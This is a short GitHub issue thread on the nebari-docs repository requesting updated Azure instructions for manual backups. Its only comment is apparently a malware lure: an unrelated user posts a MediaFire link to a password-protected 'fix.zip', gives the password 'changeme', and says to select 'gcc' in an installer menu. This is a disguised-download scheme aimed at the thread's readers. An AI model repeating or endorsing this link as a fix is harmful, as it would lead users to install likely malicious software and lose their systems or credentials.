### ISSUE TITLE
[DOC] - Update Azure instructions in Manual Backup section

### ISSUE THREAD

**Issue by Adam-D-Lewis** [nebari-dev/nebari-docs#512]
### Preliminary Checks

- [X] This issue is not a question, feature request, RFC, or anything other than a bug report. Please post those things in GitHub Discussions: https://github.com/nebari-dev/nebari/discussions

### Summary

See title

### Steps to Resolve this Issue

None

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
